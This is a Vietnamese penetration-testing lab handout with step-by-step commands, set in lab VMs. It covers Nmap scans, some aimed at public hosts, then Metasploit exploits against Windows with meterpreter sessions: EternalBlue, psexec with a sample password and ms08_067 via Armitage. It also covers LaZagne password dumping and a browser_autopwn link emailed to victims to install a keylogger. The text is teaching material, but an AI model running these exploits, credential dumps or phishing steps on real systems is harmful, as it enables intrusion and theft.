Professional Documents
Culture Documents
TH C Hành 02 - 01 - Scanning
TH C Hành 02 - 01 - Scanning
TH C Hành 02 - 01 - Scanning
Bước 5:
Chọn card mạng muốn thu thập dữ liệu
Chọn card mạng ở chế độ promiscuous
Bước 6:
Thông tin thu thập được có thể lưu lại để phân tích trong tương lai
Để lưu lại thông tin, đầu tiên tanhấn nút stop quá trình thu thập và nhấn nút
save để lưu
Khi ta đóng wireshark hay thoát khỏi wireshark hộp thoại thông báo lưu thông
tin sẽ xuất hiện, ta có thể đóng không lưu hay lưu.
Nhìn vào packet list, ta thấy được các gói tin 4,5,19,20,26,27 liên quan đến giao
tin cần phân tích.
Có thể xem chi tiết địa chỉ nguồn, địa chỉ đích, giao thức,.. trong packet detail
pane hay xem chi tiết byte trong packet byte pane.
Nếu bạn thực hiện bước Lab A ở trên phù hợp với các gói tin được hiển thị
trong cửa sổ dòng lệnh ping và bị bắt bởi Wireshark.
Trả lời câu hỏi sau:
1. Giao thức nào được dùng trong lệnh ping?__________________________
2. Tên đầy đủ của giao thức:_______________________________________
3. Hai gói tin được sử dụng trong giao thức ping_______________________
4. Ping thuộc lớp mấy trong tầng TCP/IP_____________________________
5. Nhiệm vụ của ping trong hệ thống mạng là gi?______________________
____________________________________________________________
3 Lab B
Dùng công cụ scan mạng: Nmap, Nessus
3.1 Nmap
Sử dụng Nmap để thăm dò trong một subnet xem có bao nhiêu host up và các port
nào của host này mở. Từ đó ta xác định được đối tượng tấn công.
1. Scanning nmap
Lập bản đồ mạng (Network mapping)
Phát hiện hệ điều hành(OS detection)
Dò tìm dịch vụ (Service discovery)
Kiểm tra bảo mật (Security auditing)
a. Sử dụng Nmap cho các mạng cục bộ
1. Host Scan
Quét máy chủ được sử dụng bởi người kiểm tra thâm nhập để xác định máy
chủ đang hoạt động trong mạng bằng cách gửi các gói yêu cầu ARP đến tất cả hệ
thống trong mạng đó
Syntax: nmap -sP <target IP range>
nmap -sn <target IP range>
nmap -sP 192.168.1.1-225
ALL Ports
nmap -p1-65535 192.168.1.127 –open
Specific Ports by Protocols
Syntax: nmap -pT:25,U:53 <target>
3. Port Service name
Nếu bạn không biết số cổng chính xác để liệt kê thì bạn cũng có thể đề
cập đến tên dịch vụ để quét trạng thái cổng
Syntax: nmap –p[service]<target>
nmap -p msrpc 192.168.1.127
4. UDP Scan
Các dịch vụ UDP hầu như bị bỏ qua trong quá trình kiểm tra thâm nhập,
nhưng những người kiểm tra khả năng thâm nhập tốt biết rằng chúng
thường tiết lộ thông tin thiết yếu của máy chủ hoặc thậm chí có thể dễ bị
tấn công hơn nữa được sử dụng để xâm nhập máy chủ. Phương pháp này
trình bày cách sử dụng Nmap để liệt kê tất cả các cổng UDP đang mở
trên máy chủ.
syntax: nmap –sU <target>
nmap -sU 192.168.1.127
UDP Port Range
Syntax: nmap -p1-500 -sU <target>
ALL UDP PORT
Syntax: nmap -sU -p- <target>
5. Quét Nmap “nhanh" (-F) trên phạm vi mạng có thể tạo nhanh sách tất cả
các địa chỉ IP
nmap -F 192.168.0.0/24
nmap -F wonderhowto.com
6. Nmap có thể cho thấy hệ điều hành (-O) đang được sử dụng
nmap -O 104.193.19.59
7. Tìm hiểu về các phiên bản phần mềm đang chạy với các cổng đang mở
nmap -sV 104.193.19.59
8. Nhập địa chỉ IP đích và sau đó nhập -A để bật tính năng phát hiện hệ điều
hành, phát hiện phiên bản
nmap 104.193.19.59 -A
9. Tính toán mạng con và quét một phạm vi cụ thể để tìm ra các thiết bị
ipcalc 127.0.0.1
10. Nmap để tiến hành quét ARP với truy vấn -PR
nmap -PR 192.168.0.0/24
nmap -sn 192.168.1.100
11. Port scanning
a. TCP SYN (Stealth) Scan (-sS)
nmap -p22,113,139 scanme.nmap.org
nmap -d --packet-trace -p22,113,139 scanme.nmap.org
b. TCP Connect Scan (-sT)
nmap -T4 -sT scanme.nmap.org
c. UDP Scan (-sU)
nmap -sU -v felix
d. TCP FIN, NULL, and Xmas Scans (-sF, -sN, -sX)
nmap -sF -T4 para (fin xmas scan)
nmap -sS -T4 docsrv.caldera.com (syn scan)
nmap -sF -T4 docsrv.caldera.com (fin scan)
nmap -sF --scanflags PSH para (psh scan)
17. Http-enum
map -sV –script=http-enum 127.0.0.1
Trong backtrack ta sử dụng zenmap là phần mềm Nmap có giao diện.
Giao diện Nmap xuất hiện, nhập subnet mạng cần scan
Kết quả scan trong nmap hiển thị các thông số về os, port, service và version. Dựa
vào đó ta phân tích và đánh giá các đối tượng nào sẽ là đối tượng tấn công.
Tuy nhiên trong Nmap không cho ta biết được các host đó đang có lỗ hổng nào có
thể tấn công được, để dò lỗ hổng có thể sử dụng phần mềm Retina hay Nessus.
Trong lab này sử dụng phần mềm Nessus
3.2 Nessus
Cài đặt nessus trong Backtrack
1. Search xem các phiên bản nessus trong backtrack
root@apt-get update //cập nhật các packet
root@aptitude search nessus //search xem gói nessus có hỗ trợ trong backtrack
Trong phiên bản backtrack 5, nessus đã được cài sẵn.
2. Khởi động nessus
Khi đăng kí thành công ta nhận được key được gởi tới email mà ta đăng kí.
Nhập key với lệnh:
/opt/nessus/bin/nessus-fetch –register YOUR REGISTRATIN CODE
root@bt:~# /opt/nessus/bin/nessus-fetch --register E8A5-5367-982E-05CB-
972A
Host chạy hệ điều hành win 2k3 có 4 lỗ hổng nguy hiểm, từ đó ta có thể tấn
công qua các lỗ hổng này. Lab kế tiếp ta dùng công cụ Armitage tấn công lỗ
hổng MS08_067.
4 Lab C:
Dùng công cụ Metaploit dựa vào lỗ hổng hệ điều hành xâm nhập vào chiếm
quyền điều khiển.
Trong lab này cần có 2 máy tính:
1. Máy ảo chạy hệ điều hành Kali
2. Máy dùng hệ điều hành Microsoft Windows Server 2008 (không bật firewall
client).
Bước 1: ScanEternal Blue Vulnerability in Remote PC
1. Cách 1: Dùng công cụ Nessus
2. Cách 2: Dùng escan
o Tải escan từ github
git clone https://github.com/peterpt/eternal_scanner.git && cd eternal_scanner
./escan
Nhập địa chỉ máy nạn nhân
4. Dùng Metasploit
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106
msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104
msf auxiliary(smb_ms17_010) > set rport 445
msf auxiliary(smb_ms17_010) > exploit
Bước 2:
1. Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool
Corruption
a. Msfconsole
Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) >set 192.168.1.21
msf exploit(ms17_010_eternalblue) >set payload
windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit
Từ ảnh chụp màn hình, bạn có thể thấy chúng ta đã có meterpreter session sau khi
khai thác tràn bộ đệm bằng cách ghi đè bộ đệm SMBV1.
meterpreter> sysinfo
2. Microsoft Windows Authenticated User Code Execution
- Máy Windows Server2008 R2
msf > use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ignite@123
msf exploit(windows/smb/psexec) > exploit
Nếu Connection bị từ chối không kết nối được database thực hiện bước tiếp theo
3. khởi động Msfgui để lấy account kết nối database
Nhấn vào để khởi động một msfrpcd mới
Chờ cho msf khởi động thành công nhấn vào File chọn show connection
detail
5. Trước khi tấn công, cần scan các máy trong mạng để xác định mục tiêu
tấn công, sử dụng Nmap.
Nhập địa chỉ ip cần scan vào, ta có thể scan chính xác một đối tượng hay scan
toàn bộ dãy mạng, trong bài lab này máy đối tượng có địa chỉ ip: 10.0.0.33, ta có
thể scan chính xác ip 10.0.0.33 hay scan toàn bộ lớp mạng 10.0.0.0/24.
Sau khi scan thành công sẽ xuất hiện giao diện hiện đối tượng ta muốn tấn công.
Nhấn Ok hoàn thành qua trình scan đối tượng
6. Click phải chọn Auto-layout Stack cố định đối tượng
7. Bước này tìm cách tấn công qua port, ta thấy máy win XP đang mở các
port 139,445,1433,3389, ta tìm cách tấn công qua các port đang mở.
Chọn Attacks Find attacks by port
Sau khi phân tích thành công sẽ xuất hiện thông báo và nhấn OK để hoàn thành
và thực hiện bước kế tiếp.
8. Click phải đối tượng chọn Attack smb check exploits
9. sau khi check exploits thành công, tìm lỗ hổng nào là đối tượng có thể
tấn công vào được ta sẽ tìm thấy câu hiển thị: “The target is vulnerable”.
10. click phải vào máy 10.0.0.3 chọn Attack smb chọn lỗ hổng có
thể vulnerable, trong lab này lỗ hổng tên “ms08_067_netapi”.
Khi chọn xong lỗ hổng sẽ xuất hiện hộp thoại chi tiết các phương pháp tấn công,
Khi tấn công thành công đối tượng sẽ chuyển từ màu xanh sang màu đỏ.
11.chọn cách để xâm nhập hay chiếm quyền điều khiển máy tính 10.0.0.33.
Có nhiều cách sử dụng để tấn công xâm nhập:
1. Dùng Explore để browse file hay show processes, screenshot
2. Dùng interact để chạy command shell để shutdown hay restart,..
3. Cài phầm mềm gián điệp hay cấy trojan, virus vào máy
Nếu thực hiện theo đúng hướng dẫn lab B, ta sẽ tấn công được máy tính thiếu
tính bảo mật, có nhiều lỗ hổng chưa được fix.
1. Upload lazagne
2. Help screen
3. Lấy tất cả password
Câu hỏi:
1. Vì sao máy 10.0.0.3 dễ dàng bị tấn công?___________________________
_________________________________________________________________
2. Làm thế nào để tăng tính bảo mật cho máy 10.0.0.3 không bị tấn công?___
_________________________________________________________________
_________________________________________________________________
3. Tăng tính bảo mật cho máy 10.0.0.33 và thực hiện tấn công metaploit lại
xem máy 10.0.0.33 có tấn công được không?________________________
Yêu cầu lab:
1. Thực hiện 2 bài lab và quay phim lại với các công cụ hỗ trợ quay (như
Camtaisa hay tương đương)
2. Sử dụng phầm mềm tạo máy ảo như Vmware hay tương đương
3. Cài đặt các phần mềm như hướng dẫn
4. Trả lời các câu hỏi trong các lab
5. Nộp lại các file quay phim
5 Lab D
Sử dụng Keylog với msfconsole
1. Khởi động msfconsole
2. Exploit window
msf > use auxiliary /server/browser_autopwn
Ta có thể dùng lệnh show options để xem các lệnh cài đặt trong
browser_autopwn
Cần set giá trị Lhost (host nhận thông tin – địa chỉ máy backtrack)
Set giá trị port
Set uri
Ta start browser_autopwn bằng lệnh exploit or run
Sau khi quá trình chạy browser _autopwn hoàn thành ta sẽ thấy được link như sau:
http://10.0.0.45:80/stu
Ta gởi link này cho các đối tượng qua email, yahoo,..
Khi click vào link các đối tượng sẽ dính keylog.
Trên máy backtrack ta sẽ thấy được keylog chèn vào máy nạn nhân (notepad.exe)
Bây giờ ta chiếm quyền máy 10.0.0.42 tương tự như dùng công cụ Armitage
Để biết các lệnh trong meterpreter ta dùng lệnh:Meterpreter > ?
Để start keylog : meterpreter > keyscan_start
Xem kết quả: meterpreter > keyscan_dump